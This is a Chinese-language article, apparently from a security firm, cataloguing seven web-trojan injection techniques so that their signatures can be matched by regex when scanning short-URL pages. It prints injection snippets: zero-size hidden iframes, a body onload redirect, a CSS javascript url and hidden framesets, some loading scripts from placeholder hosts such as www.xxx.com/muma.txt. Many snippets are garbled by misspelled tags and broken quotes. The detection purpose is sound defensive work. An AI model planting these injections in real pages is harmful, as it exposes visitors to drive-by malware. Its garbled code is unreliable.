短网址全解析:网页木马常见的挂马技术

短网址网页源码的DOM解析技术,在处理完爬取下来的短网址网页源码后,接下来要进行的是短网址源码与短网址页面木马特征值的匹配。要完成匹配的工作,就需要建立短网址网页木马特征值的正则表达式库,然后实现短网址网页源码与正则表达式的匹配。

 \"网站挂马\"

短网址网页木马解析之常见挂马方式

由于该技术是公司项目,主要为互联网提供安全保护服务,因此在项目成立初就针对这些网站进行了详细的调研,对此类站点遇到的挂马方式进行了详细的总结和整理,再结合目前互联网上的主流挂马方式,建立起短网址的木马特征库。根据前期调研总结了此类站点最常的挂马方式.具体如下:

短网址木马解析1、框架挂马:

<ifiaine src ="网页木马地址"width = “0” height = “0”></iframe>

iframe是普通的HTML标签,主要用来在一个网页界面中,划分出左右或者上下的框架,侵入者利用ifome的功能,在正常网页中,写入长宽为0的隐藏框架,让用户在不知不觉中就打开了木马网站。

短网址木马解析2、JS文件挂马:

JS文件挂马方法是,将指向木马的代码写入文件,保存为xxx.js,然后通过写入<script language= "javascript" src = "xxx.Js”></script>来实现桂马。指向木马的代码如下:

documet.write("<iframe width =”0” height = "0" src=’网页木马地址’>”)。


短网址木马解析3、JS变形加密:

利用jscript.encode加密,会使代码更具隐蔽性,这里的挂马网址的文件后缀是muma.txt,除此之外,还可以引入其他扩展名的JS代码。

<script language ="jscript.Encode” src =

"http://www.xxx.com/muma.txt”></script>


短网址木马解析4、body挂马:

使用如下代码,就可政使网页在加载完成的时候跳转到网页木马的网址

<body onload ="window.location =’网页木马地址’;”></body〉。

短网址木马解析5、css挂马:

在文挡的样式表中使用URL函数引入木马链接,具体格式如下:

body { background-image : url (‘javascript:

document.write ("<script src

=’http://www.xx.Net/muma.Js’〉</script>”)’)}。


短网址木马解析6、图片挂码:

这种挂马方式利用图片作为伪装,用户点击图片,一个看不见的窗口被激活运行,木马也随之被运行。挂马代码如下:

<html>

<iframe src =’网页木马地址’height = 0 width

= 0 ></iframe>

<Lmg src =‘图片地址’></center>

</html>

 

短网址木马解析7、利用隐藏的分割框架引入网页木马:示例代码如下:

<frameset row = ‘‘444,0”cols = "*”>

<frame src =”打开网页”framborder = "no" scrolling

=”auto"noresize marginwidth=‘”0”marginheight="0”>

<fiame src="网巧木马地址"framborder = "no" scrolling

= "auto" noresize marginwidth=”0”marginheight = "0’’>